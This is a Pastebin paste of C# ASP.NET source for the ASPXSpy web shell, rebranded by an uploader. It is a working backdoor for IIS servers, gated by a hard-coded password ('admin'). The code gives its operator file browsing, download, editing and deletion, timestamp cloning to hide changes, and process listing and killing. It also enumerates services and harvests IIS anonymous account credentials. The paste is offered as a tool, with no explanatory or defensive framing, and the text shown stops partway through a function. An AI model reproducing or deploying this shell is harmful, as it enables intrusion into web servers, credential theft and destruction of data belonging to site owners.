daily pastebin goal
62%
SHARE
TWEET

shell.aspx

shirotenshi Sep 24th, 2016 3,093 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
  2. <%@ import Namespace="System.IO"%>
  3. <%@ import Namespace="System.Diagnostics"%>
  4. <%@ import Namespace="System.Data"%>
  5. <%@ import Namespace="System.Management"%>
  6. <%@ import Namespace="System.Data.OleDb"%>
  7. <%@ import Namespace="Microsoft.Win32"%>
  8. <%@ import Namespace="System.Net.Sockets" %>
  9. <%@ import Namespace="System.Net" %>
  10. <%@ import Namespace="System.Runtime.InteropServices"%>
  11. <%@ import Namespace="System.DirectoryServices"%>
  12. <%@ import Namespace="System.ServiceProcess"%>
  13. <%@ import Namespace="System.Text.RegularExpressions"%>
  14. <%@ Import Namespace="System.Threading"%>
  15. <%@ Import Namespace="System.Data.SqlClient"%>
  16. <%@ import Namespace="Microsoft.VisualBasic"%>
  17. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  18. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  19. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  20. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
  21. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  22. <script runat="server">
  23. /*
  24. Blog: http://shirotenshii.blogspot.com
  25. E-mail : anoaghost@gmail.com
  26. */
  27. public string Password="21232f297a57a5a743894a0e4a801fc3";// password : admin
  28. public string vbhLn="ASPXSpy";
  29. public int TdgGU=1;
  30. protected OleDbConnection Dtdr=new OleDbConnection();
  31. protected OleDbCommand Kkvb=new OleDbCommand();
  32. public NetworkStream NS=null;
  33. public NetworkStream NS1=null;
  34. TcpClient tcp=new TcpClient();
  35. TcpClient zvxm=new TcpClient();
  36. ArrayList IVc=new ArrayList();
  37. protected void Page_load(object sender,EventArgs e)
  38. {
  39. YFcNP(this);
  40. fhAEn();
  41. if (!pdo())
  42. {
  43. return;
  44. }
  45. if(IsPostBack)
  46. {
  47. string tkI=Request["__EVENTTARGET"];
  48. string VqV=Request["__File"];
  49. if(tkI!="")
  50. {
  51. switch(tkI)
  52. {
  53. case "Bin_Parent":
  54. krIR(Ebgw(VqV));
  55. break;
  56. case "Bin_Listdir":
  57. krIR(Ebgw(VqV));
  58. break;
  59. case "kRXgt":
  60. kRXgt(Ebgw(VqV));
  61. break;
  62. case "Bin_Createfile":
  63. gLKc(VqV);
  64. break;
  65. case "Bin_Editfile":
  66. gLKc(VqV);
  67. break;
  68. case "Bin_Createdir":
  69. stNPw(VqV);
  70. break;
  71. case "cYAl":
  72. cYAl(VqV);
  73. break;
  74. case "ksGR":
  75. ksGR(Ebgw(VqV));
  76. break;
  77. case "SJv":
  78. SJv(VqV);
  79. break;
  80. case "Bin_Regread":
  81. tpRQ(Ebgw(VqV));
  82. break;
  83. case "hae":
  84. hae();
  85. break;
  86. case "urJG":
  87. urJG(VqV);
  88. break;
  89. }
  90. if(tkI.StartsWith("dAJTD"))
  91. {
  92. dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
  93. }
  94. else if(tkI.StartsWith("Tlvz"))
  95. {
  96. Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
  97. }
  98. else if(tkI.StartsWith("Bin_CFile"))
  99. {
  100. YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
  101. }
  102. }
  103. }
  104. else
  105. {
  106. PBZw();
  107. }
  108. }
  109. public bool pdo()
  110. {
  111. if(Request.Cookies[vbhLn]==null)
  112. {
  113. tZSx();
  114. return false;
  115. }
  116. else
  117. {
  118. if (Request.Cookies[vbhLn].Value != Password)
  119. {
  120. tZSx();
  121. return false;
  122. }
  123. else
  124. {
  125. return true;
  126. }
  127. }
  128. }
  129. public void tZSx()
  130. {
  131. ljtzC.Visible=true;
  132. ZVS.Visible=false;
  133. }
  134. protected void YKpI(object sender,EventArgs e)
  135. {
  136. Session.Abandon();
  137. Response.Cookies.Add(new HttpCookie(vbhLn,null));
  138. tZSx();
  139. }
  140. public void PBZw()
  141. {
  142. ZVS.Visible=true;
  143. ljtzC.Visible=false;
  144. Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
  145. Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
  146. Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
  147. Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
  148. Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
  149. if (AXSbb.Value==string.Empty)
  150. {
  151. AXSbb.Value=OElM(Server.MapPath("."));
  152. }
  153. Bin_H2_Title.InnerText="File Manager >>";
  154. krIR(AXSbb.Value);
  155. }
  156. public void fhAEn()
  157. {
  158. try
  159. {
  160. string[] YRgt=Directory.GetLogicalDrives();
  161. for(int i=0;i<YRgt.Length;i++)
  162. {
  163. Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
  164. Bin_Span_Drv.Controls.Add(c);
  165. LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
  166. nxeDR.Command+=new CommandEventHandler(this.iVk);
  167. }
  168. }catch(Exception ex){}
  169. }
  170. public string OElM(string path)
  171. {
  172. if(path.Substring(path.Length-1,1)!=@"\")
  173. {
  174. path=path+@"\";
  175. }
  176. return path;
  177. }
  178. public string nrrx(string path)
  179. {
  180. char[] trim={'\\'};
  181. if(path.Substring(path.Length-1,1)==@"\")
  182. {
  183. path=path.TrimEnd(trim);
  184. }
  185. return path;
  186. }
  187. [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
  188. public static extern int OMZP(string nDrive);
  189. public string mFvj(string instr)
  190. {
  191. string EuXD=string.Empty;
  192. int num=OMZP(instr);
  193. switch(num)
  194. {
  195. case 1:
  196. EuXD="Unknow("+instr+")";
  197. break;
  198. case 2:
  199. EuXD="Removable("+instr+")";
  200. break;
  201. case 3:
  202. EuXD="Fixed("+instr+")";
  203. break;
  204. case 4:
  205. EuXD="Network("+instr+")";
  206. break;
  207. case 5:
  208. EuXD="CDRom("+instr+")";
  209. break;
  210. case 6:
  211. EuXD="RAM Disk("+instr+")";
  212. break;
  213. }
  214. return EuXD.Replace(@"\","");
  215. }
  216. public string MVVJ(string instr)
  217. {
  218. byte[] tmp=Encoding.Default.GetBytes(instr);
  219. return Convert.ToBase64String(tmp);
  220. }
  221. public string Ebgw(string instr)
  222. {
  223. byte[] tmp=Convert.FromBase64String(instr);
  224. return Encoding.Default.GetString(tmp);
  225. }
  226. public void krIR(string path)
  227. {
  228. WICxe();
  229. CzfO.Visible=true;
  230. Bin_H2_Title.InnerText="File Manager >>";
  231. AXSbb.Value=OElM(path);
  232. DirectoryInfo GQMM=new DirectoryInfo(path);
  233. if(Directory.GetParent(nrrx(path))!=null)
  234. {
  235. string bg=OKM();
  236. TableRow p=new TableRow();
  237. for(int i=1;i<6;i++)
  238. {
  239. TableCell pc=new TableCell();
  240. if(i==1)
  241. {
  242. pc.Width=Unit.Parse("2%");
  243. pc.Text="0";
  244. p.CssClass=bg;
  245. }
  246. if(i==2)
  247. {
  248. pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
  249. }
  250. p.Cells.Add(pc);
  251. UGzP.Rows.Add(p);
  252. }
  253. }
  254. try
  255. {
  256. int vLlH=0;
  257. foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
  258. {
  259. string bg=OKM();
  260. vLlH++;
  261. TableRow tr=new TableRow();
  262. TableCell tc=new TableCell();
  263. tc.Width=Unit.Parse("2%");
  264. tc.Text="0";
  265. tr.Attributes["onmouseover"]="this.className='focus';";
  266. tr.CssClass=bg;
  267. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  268. tr.Cells.Add(tc);
  269. TableCell HczyN=new TableCell();
  270. HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
  271. tr.Cells.Add(HczyN);
  272. TableCell LYZK=new TableCell();
  273. LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
  274. tr.Cells.Add(LYZK);
  275. UGzP.Rows.Add(tr);
  276. TableCell ERUL=new TableCell();
  277. ERUL.Text="--";
  278. tr.Cells.Add(ERUL);
  279. UGzP.Rows.Add(tr);
  280. TableCell ZGKh=new TableCell();
  281. ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
  282. tr.Cells.Add(ZGKh);
  283. UGzP.Rows.Add(tr);
  284. }
  285. TableRow cKVA=new TableRow();
  286. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
  287. cKVA.Attributes["bgcolor"]="#dddddd";
  288. TableCell JlmW=new TableCell();
  289. JlmW.Attributes["colspan"]="6" ;
  290. JlmW.Attributes["height"]="5";
  291. cKVA.Cells.Add(JlmW);
  292. UGzP.Rows.Add(cKVA);
  293. int aYRwo=0;
  294. foreach(FileInfo Bin_Files in GQMM.GetFiles())
  295. {
  296. aYRwo++;
  297. string gb=OKM();
  298. TableRow tr=new TableRow();
  299. TableCell tc=new TableCell();
  300. tc.Width=Unit.Parse("2%");
  301. tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
  302. tr.Attributes["onmouseover"]="this.className='focus';";
  303. tr.CssClass=gb;
  304. tr.Attributes["onmouseout"]="this.className='"+gb+"';";
  305. tr.Cells.Add(tc);
  306. TableCell filename=new TableCell();
  307. if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
  308. {
  309. string url=Request.Url.ToString();
  310. filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
  311. }
  312. else
  313. {
  314. filename.Text=Bin_Files.Name;
  315. }
  316. TableCell albt=new TableCell();
  317. albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
  318. TableCell YzK=new TableCell();
  319. YzK.Text=mTG(Bin_Files.Length);
  320. TableCell GLpi=new TableCell();
  321. GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
  322. tr.Cells.Add(filename);
  323. tr.Cells.Add(albt);
  324. tr.Cells.Add(YzK);
  325. tr.Cells.Add(GLpi);
  326. UGzP.Rows.Add(tr);
  327. }
  328. string lgb=OKM();
  329. TableRow oWam=new TableRow();
  330. oWam.CssClass=lgb;
  331. for(int i=1;i<4;i++)
  332. {
  333. TableCell lGV=new TableCell();
  334. if(i==1)
  335. {
  336. lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
  337. }
  338. if(i==2)
  339. {
  340. lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
  341. }
  342. if(i==3)
  343. {
  344. lGV.ColumnSpan=4;
  345. lGV.Style.Add("text-align","right");
  346. lGV.Text=vLlH+" directories/ "+aYRwo+" files";
  347. }
  348. oWam.Cells.Add(lGV);
  349. }
  350. UGzP.Rows.Add(oWam);
  351. }
  352. catch(Exception error)
  353. {
  354. xseuB(error.Message);
  355. }
  356. }
  357. public string OKM()
  358. {
  359. TdgGU++;
  360. if(TdgGU % 2==0)
  361. {
  362. return "alt1";
  363. }
  364. else
  365. {
  366. return "alt2";
  367. }
  368. }
  369. public void kRXgt(string qcKu)
  370. {
  371. try
  372. {
  373. Directory.Delete(qcKu,true);
  374. xseuB("Directory delete new success !");
  375. }
  376. catch(Exception error)
  377. {
  378. xseuB(error.Message);
  379. }
  380. krIR(Directory.GetParent(qcKu).ToString());
  381. }
  382. public void dAJTD(string sdir,string ddir)
  383. {
  384. try
  385. {
  386. Directory.Move(sdir,ddir);
  387. xseuB("Directory Renamed Success !");
  388. }
  389. catch(Exception error)
  390. {
  391. xseuB(error.Message);
  392. }
  393. krIR(AXSbb.Value);
  394. }
  395. public void Tlvz(string sfile,string dfile)
  396. {
  397. try
  398. {
  399. File.Move(sfile,dfile);
  400. xseuB("File Renamed Success !");
  401. }
  402. catch(Exception error)
  403. {
  404. xseuB(error.Message);
  405. }
  406. krIR(AXSbb.Value);
  407. }
  408. public void YByN(string spath,string dpath)
  409. {
  410. try
  411. {
  412. File.Copy(spath,dpath);
  413. xseuB("File Copy Success !");
  414. }
  415. catch(Exception error)
  416. {
  417. xseuB(error.Message);
  418. }
  419. krIR(AXSbb.Value);
  420. }
  421. public void stNPw(string path)
  422. {
  423. try
  424. {
  425. Directory.CreateDirectory(AXSbb.Value+path);
  426. xseuB("Directory created success !");
  427. }
  428. catch(Exception error)
  429. {
  430. xseuB(error.Message);
  431. }
  432. krIR(AXSbb.Value);
  433. }
  434. public void gLKc(string path)
  435. {
  436. if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
  437. {
  438. foreach(ListItem item in NdCX.Items)
  439. {
  440. if(item.Selected=true)
  441. {
  442. item.Selected=false;
  443. }
  444. }
  445. }
  446. Bin_H2_Title.InnerHtml="Create/ Edit File >>";
  447. WICxe();
  448. vrFA.Visible=true;
  449. if(path.IndexOf(":")< 0)
  450. {
  451. Sqon.Value=AXSbb.Value+path;
  452. }
  453. else
  454. {
  455. Sqon.Value=path;
  456. }
  457. if(File.Exists(Sqon.Value))
  458. {
  459. StreamReader sr;
  460. if(NdCX.SelectedItem.Text=="UTF-8")
  461. {
  462. sr=new StreamReader(Sqon.Value,Encoding.UTF8);
  463. }
  464. else
  465. {
  466. sr=new StreamReader(Sqon.Value,Encoding.Default);
  467. }
  468. Xgvv.InnerText=sr.ReadToEnd();
  469. sr.Close();
  470. }
  471. else
  472. {
  473. Xgvv.InnerText=string.Empty;
  474. }
  475. }
  476. public void ksGR(string path)
  477. {
  478. FileInfo fs=new FileInfo(path);
  479. Response.Clear();
  480. Page.Response.ClearHeaders();
  481. Page.Response.Buffer=false;
  482. this.EnableViewState=false;
  483. Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
  484. Response.AddHeader("Content-Length",fs.Length.ToString());
  485. Page.Response.ContentType="application/unknown";
  486. Response.WriteFile(fs.FullName);
  487. Page.Response.Flush();
  488. Page.Response.Close();
  489. Response.End();
  490. Page.Response.Clear();
  491. }
  492. public void SJv(string path)
  493. {
  494. try
  495. {
  496. string[] spdT=path.Split(',');
  497. for(int i=0;i<spdT.Length-1;i++)
  498. {
  499. File.Delete(AXSbb.Value+Ebgw(spdT[i]));
  500. }
  501. xseuB("File Delete Success !");
  502. }
  503. catch(Exception error)
  504. {
  505. xseuB(error.Message);
  506. }
  507. krIR(AXSbb.Value);
  508. }
  509. public void hae()
  510. {
  511. try
  512. {
  513. File.Delete(Request.PhysicalPath);
  514. Response.Redirect("http://www.rootkit.net.cn");
  515. }
  516. catch(Exception error)
  517. {
  518. xseuB(error.Message);
  519. }
  520. }
  521. public void cYAl(string path)
  522. {
  523. Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
  524. WICxe();
  525. zRyG.Visible=true;
  526. QiFB.Value=AXSbb.Value+path;
  527. lICp.Value=AXSbb.Value;
  528. pWVL.Value=AXSbb.Value+path;
  529. string Att=File.GetAttributes(QiFB.Value).ToString();
  530. if(Att.LastIndexOf("ReadOnly")!=-1)
  531. {
  532. ZhWSK.Checked=true;
  533. }
  534. if(Att.LastIndexOf("System")!=-1)
  535. {
  536. SsR.Checked=true;
  537. }
  538. if(Att.LastIndexOf("Hidden")!=-1)
  539. {
  540. ccB.Checked=true;
  541. }
  542. if(Att.LastIndexOf("Archive")!=-1)
  543. {
  544. fbyZ.Checked=true;
  545. }
  546. yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
  547. uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
  548. aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
  549. }
  550. public static String mTG(Int64 fileSize)
  551. {
  552. if(fileSize<0)
  553. {
  554. throw new ArgumentOutOfRangeException("fileSize");
  555. }
  556. else if(fileSize >= 1024 * 1024 * 1024)
  557. {
  558. return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
  559. }
  560. else if(fileSize >= 1024 * 1024)
  561. {
  562. return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
  563. }
  564. else if(fileSize >= 1024)
  565. {
  566. return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
  567. }
  568. else
  569. {
  570. return string.Format("{0} B",fileSize);
  571. }
  572. }
  573. private bool SGde(string sSrc)
  574. {
  575. Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
  576. if(reg.IsMatch(sSrc))
  577. {
  578. return true;
  579. }
  580. else
  581. {
  582. return false;
  583. }
  584. }
  585. public void AdCx()
  586. {
  587. string qcKu=string.Empty;
  588. string mWGEm="IIS://localhost/W3SVC";
  589. GlI.Style.Add("word-break","break-all");
  590. try
  591. {
  592. DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
  593. int fmW=0;
  594. foreach(DirectoryEntry child in HHzcY.Children)
  595. {
  596. if(SGde(child.Name.ToString()))
  597. {
  598. fmW++;
  599. DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
  600. DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
  601. string bg=OKM();
  602. TableRow TR=new TableRow();
  603. TR.Attributes["onmouseover"]="this.className='focus';";
  604. TR.CssClass=bg;
  605. TR.Attributes["onmouseout"]="this.className='"+bg+"';";
  606. TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
  607. for(int i=1;i<6;i++)
  608. {
  609. try
  610. {
  611. TableCell tfit=new TableCell();
  612. switch(i)
  613. {case 1:
  614. tfit.Text=fmW.ToString();
  615. break;
  616. case 2:
  617. tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
  618. break;
  619. case 3:
  620. tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
  621. break;
  622. case 4:
  623. StringBuilder sb=new StringBuilder();
  624. PropertyValueCollection pc=child.Properties["ServerBindings"];
  625. for (int j=0; j < pc.Count; j++)
  626. {
  627. sb.Append(pc[j].ToString()+"<br>");
  628. }
  629. tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
  630. break;
  631. case 5:
  632. tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
  633. break;
  634. }
  635. TR.Cells.Add(tfit);
  636. }
  637. catch (Exception ex)
  638. {
  639. xseuB(ex.Message);
  640. continue;
  641. }
  642. }
  643. GlI.Controls.Add(TR);
  644. }
  645. }
  646. }
  647. catch(Exception ex)
  648. {
  649. xseuB(ex.Message);
  650. }
  651. }
  652. public ManagementObjectCollection PhQTd(string query)
  653. {
  654. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
  655. return QS.Get();
  656. }
  657. public DataTable cCf(string query)
  658. {
  659. DataTable dt=new DataTable();
  660. int i=0;
  661. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
  662. try
  663. {
  664. foreach(ManagementObject m in QS.Get())
  665. {
  666. DataRow dr=dt.NewRow();
  667. PropertyDataCollection.PropertyDataEnumerator oEnum;
  668. oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
  669. while(oEnum.MoveNext())
  670. {
  671. PropertyData DRU=(PropertyData)oEnum.Current;
  672. if(dt.Columns.IndexOf(DRU.Name)==-1)
  673. {
  674. dt.Columns.Add(DRU.Name);
  675. dt.Columns[dt.Columns.Count-1].DefaultValue="";
  676. }
  677. if(m[DRU.Name]!=null)
  678. {
  679. dr[DRU.Name]=m[DRU.Name].ToString();
  680. }
  681. else
  682. {
  683. dr[DRU.Name]=string.Empty;
  684. }
  685. }
  686. dt.Rows.Add(dr);
  687. }
  688. }
  689. catch(Exception error)
  690. {
  691. }
  692. return dt;
  693. }
  694. public void YUw()
  695. {
  696. try
  697. {
  698. Bin_H2_Title.InnerText="Process >>";
  699. WICxe();
  700. DCbS.Visible=true;
  701. int UEbTI=0;
  702. Process[] p=Process.GetProcesses();
  703. foreach(Process sp in p)
  704. {
  705. UEbTI++;
  706. string bg=OKM();
  707. TableRow tr=new TableRow();
  708. tr.Attributes["onmouseover"]="this.className='focus';";
  709. tr.CssClass=bg;
  710. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  711. for(int i=1;i<7;i++)
  712. {
  713. TableCell td=new TableCell();
  714. if(i==1)
  715. {
  716. td.Width=Unit.Parse("2%");
  717. td.Text=UEbTI.ToString();
  718. tr.Controls.Add(td);
  719. }
  720. if(i==2)
  721. {
  722. td.Text=sp.Id.ToString();
  723. tr.Controls.Add(td);
  724. }
  725. if(i==3)
  726. {
  727. td.Text=sp.ProcessName.ToString();
  728. tr.Controls.Add(td);
  729. }
  730. if(i==4)
  731. {
  732. td.Text=sp.Threads.Count.ToString();
  733. tr.Controls.Add(td);
  734. }
  735. if(i==5)
  736. {
  737. td.Text=sp.BasePriority.ToString();
  738. tr.Controls.Add(td);
  739. }
  740. if(i==6)
  741. {
  742. td.Text="--";
  743. tr.Controls.Add(td);
  744. }
  745. }
  746. IjsL.Controls.Add(tr);
  747. }
  748. }
  749. catch(Exception error)
  750. {
  751. AIz();
  752. }
  753. AIz();
  754. }
  755. public void AIz()
  756. {
  757. try
  758. {
  759. Bin_H2_Title.InnerText="Process >>";
  760. WICxe();
  761. DCbS.Visible=true;
  762. int UEbTI=0;
  763. DataTable dt=cCf("Win32_Process");
  764. for(int j=0;j<dt.Rows.Count;j++)
  765. {
  766. UEbTI++;
  767. string bg=OKM();
  768. TableRow tr=new TableRow();
  769. tr.Attributes["onmouseover"]="this.className='focus';";
  770. tr.CssClass=bg;
  771. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  772. for(int i=1;i<7;i++)
  773. {
  774. TableCell td=new TableCell();
  775. if(i==1)
  776. {
  777. td.Width=Unit.Parse("2%");
  778. td.Text=UEbTI.ToString();
  779. tr.Controls.Add(td);
  780. }
  781. if(i==2)
  782. {
  783. td.Text=dt.Rows[j]["ProcessID"].ToString();
  784. tr.Controls.Add(td);
  785. }
  786. if(i==3)
  787. {
  788. td.Text=dt.Rows[j]["Name"].ToString();
  789. tr.Controls.Add(td);
  790. }
  791. if(i==4)
  792. {
  793. td.Text=dt.Rows[j]["ThreadCount"].ToString();
  794. tr.Controls.Add(td);
  795. }
  796. if(i==5)
  797. {
  798. td.Text=dt.Rows[j]["Priority"].ToString();
  799. tr.Controls.Add(td);
  800. }
  801. if(i==6)
  802. {
  803. if( dt.Rows[j]["CommandLine"]!=string.Empty)
  804. {
  805. td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
  806. }
  807. else
  808. {
  809. td.Text="--";
  810. }
  811. tr.Controls.Add(td);
  812. }
  813. }
  814. IjsL.Controls.Add(tr);
  815. }
  816. }
  817. catch(Exception error)
  818. {
  819. xseuB(error.Message);
  820. }
  821. }
  822. public void urJG(string pid)
  823. {
  824. try
  825. {
  826. foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
  827. {
  828. p.InvokeMethod("Terminate",null);
  829. p.Dispose();
  830. }
  831. xseuB("Process Kill Success !");
  832. }
  833. catch(Exception error)
  834. {
  835. xseuB(error.Message);
  836. }
  837. AIz();
  838. }
  839. public void oHpF()
  840. {
  841. try
  842. {
  843. Bin_H2_Title.InnerText="Services >>";
  844. WICxe();
  845. iQxm.Visible=true;
  846. int UEbTI=0;
  847. ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
  848. for(int i=0;i<kQmRu.Length;i++)
  849. {
  850. UEbTI++;
  851. string bg=OKM();
  852. TableRow tr=new TableRow();
  853. tr.Attributes["onmouseover"]="this.className='focus';";
  854. tr.CssClass=bg;
  855. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  856. for(int b=1;b<7;b++)
  857. {
  858. TableCell td=new TableCell();
  859. if(b==1)
  860. {
  861. td.Width=Unit.Parse("2%");
  862. td.Text=UEbTI.ToString();
  863. tr.Controls.Add(td);
  864. }
  865. if(b==2)
  866. {
  867. td.Text="null";
  868. tr.Controls.Add(td);
  869. }
  870. if(b==3)
  871. {
  872. td.Text=kQmRu[i].ServiceName.ToString();
  873. tr.Controls.Add(td);
  874. }
  875. if(b==4)
  876. {
  877. td.Text="";
  878. tr.Controls.Add(td);
  879. }
  880. if(b==5)
  881. {
  882. string kOIo=kQmRu[i].Status.ToString();
  883. if(kOIo=="Running")
  884. {
  885. td.Text="<font color=green>"+kOIo+"</font>";
  886. }
  887. else
  888. {
  889. td.Text="<font color=red>"+kOIo+"</font>";
  890. }
  891. tr.Controls.Add(td);
  892. }
  893. if(b==6)
  894. {
  895. td.Text="";
  896. tr.Controls.Add(td);
  897. }
  898. }
  899. vHCs.Controls.Add(tr);
  900. }
  901. }
  902. catch(Exception error)
  903. {
  904. xseuB(error.Message);
  905. }
  906. }
  907. public void tZRH()
  908. {
  909. try
  910. {
  911. Bin_H2_Title.InnerText="Services >>";
  912. WICxe();
  913. iQxm.Visible=true;
  914. int UEbTI=0;
  915. DataTable dt=cCf("Win32_Service");
  916. for(int j=0;j<dt.Rows.Count;j++)
  917. {
  918. UEbTI++;
  919. string bg=OKM();
  920. TableRow tr=new TableRow();
  921. tr.Attributes["onmouseover"]="this.className='focus';";
  922. tr.CssClass=bg;
  923. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  924. tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
  925. for(int i=1;i<7;i++)
  926. {
  927. TableCell td=new TableCell();
  928. if(i==1)
  929. {
  930. td.Width=Unit.Parse("2%");
  931. td.Text=UEbTI.ToString();
  932. tr.Controls.Add(td);
  933. }
  934. if(i==2)
  935. {
  936. td.Text=dt.Rows[j]["ProcessID"].ToString();
  937. tr.Controls.Add(td);
  938. }
  939. if(i==3)
  940. {
  941. td.Text=dt.Rows[j]["Name"].ToString();
  942. tr.Controls.Add(td);
  943. }
  944. if(i==4)
  945. {
  946. td.Text=dt.Rows[j]["PathName"].ToString();
  947. tr.Controls.Add(td);
  948. }
  949. if(i==5)
  950. {
  951. string kOIo=dt.Rows[j]["State"].ToString();
  952. if(kOIo=="Running")
  953. {
  954. td.Text="<font color=green>"+kOIo+"</font>";
  955. }
  956. else
  957. {
  958. td.Text="<font color=red>"+kOIo+"</font>";
  959. }
  960. tr.Controls.Add(td);
  961. }
  962. if(i==6)
  963. {
  964. td.Text=dt.Rows[j]["StartMode"].ToString();
